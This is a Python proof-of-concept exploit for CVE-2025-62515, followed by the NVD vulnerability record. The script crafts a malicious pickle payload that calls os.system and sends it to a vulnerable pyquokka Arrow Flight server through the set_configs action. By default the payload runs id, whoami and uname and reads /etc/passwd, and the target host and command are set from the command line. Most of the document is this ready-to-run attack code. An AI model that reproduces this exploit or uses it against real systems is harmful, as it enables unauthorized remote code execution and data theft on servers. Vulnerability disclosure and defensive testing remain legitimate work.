CVE-2025-62515

#!/usr/bin/env python3 """ CVE-2025-62515 PoC - pyquokka pickle deserialization RCE Exploits unsafe pickle.loads() in FlightServer.do_action() """ import pickle import os import socket import struct import pyarrow.flight as flight class MaliciousPayload: """Crafted pickle payload that executes arbitrary commands""" def __reduce__(self): # Command to execute on the target server cmd = "id; whoami; uname -a; cat /etc/passwd | head -5" return (os.system, (cmd,)) def craft_pickle_payload(command="id"): """Generate a malicious pickle payload for RCE""" class Exploit: def __reduce__(self): return (os.system, (command,)) return pickle.dumps(Exploit()) def exploit_flight_server(host, port=8080, command="id"): """ Connect to vulnerable pyquokka FlightServer and send malicious payload via set_configs action """ # Connect to the Flight server client = flight.FlightClient(f"grpc+tcp://{host}:{port}") # Craft the malicious action with pickle payload malicious_body = craft_pickle_payload(command) # Send via set_configs action (triggers do_action -> pickle.loads) action = flight.Action("set_configs", malicious_body) print(f"[*] Sending malicious payload to {host}:{port}") print(f"[*] Command to execute: {command}") try: results = list(client.do_action(action)) print("[+] Payload sent successfully") for result in results: print(f"[+] Response: {result.body.to_pybytes().decode()}") except Exception as e: print(f"[*] Request completed (server may have crashed): {e}") if __name__ == "__main__": import sys target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1" port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080 cmd = sys.argv[3] if len(sys.argv) > 3 else "id" exploit_flight_server(target, port, cmd) # Alternative: Direct socket-based exploit for lower-level testing # def raw_exploit(host, port): # import pickle # payload = pickle.dumps({"__reduce__": [os.system, ("id",)]}) # # Wrap in Arrow Flight protocol format and send via TCP # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((host, port)) # # ... (Arrow Flight gRPC framing required)

{"cve": {"id": "CVE-2025-62515", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:36.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads() to deserialize action bodies received from Flight clients without any sanitization or validation in the do_action() method. The vulnerable code is located in pyquokka/flight.py at line 283 where arbitrary data from Flight clients is directly passed to pickle.loads(). When FlightServer is configured to listen on 0.0.0.0, this allows attackers across the entire network to perform arbitrary remote code execution by sending malicious pickled payloads through the set_configs action. Additional vulnerability points exist in the cache_garbage_collect, do_put, and do_get functions where pickle.loads is used to deserialize untrusted remote data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p", "source": "[email protected]"}]}}